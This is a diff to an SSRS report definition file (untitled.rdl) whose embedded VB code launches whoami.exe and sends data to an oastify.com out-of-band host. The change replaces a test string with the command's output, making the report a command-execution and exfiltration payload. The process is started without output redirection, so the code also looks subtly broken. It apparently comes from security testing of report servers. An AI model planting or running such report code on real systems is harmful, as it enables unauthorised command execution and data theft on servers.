--- a/untitled.rdl
+++ b/untitled.rdl
@@ -46,7 +46,7 @@
   <Code>
     Dim p As System.Diagnostics.Process = System.Diagnostics.Process.Start("whoami.exe")
     Dim webClient As New System.Net.WebClient
-    Dim result As String = webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", "Hello")
+    Dim result As String = webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", p.StandardOutput.ReadToEnd())
   </Code>
   <rd:ReportUnitType>Inch</rd:ReportUnitType>
   <rd:PageUnit>Px</rd:PageUnit>
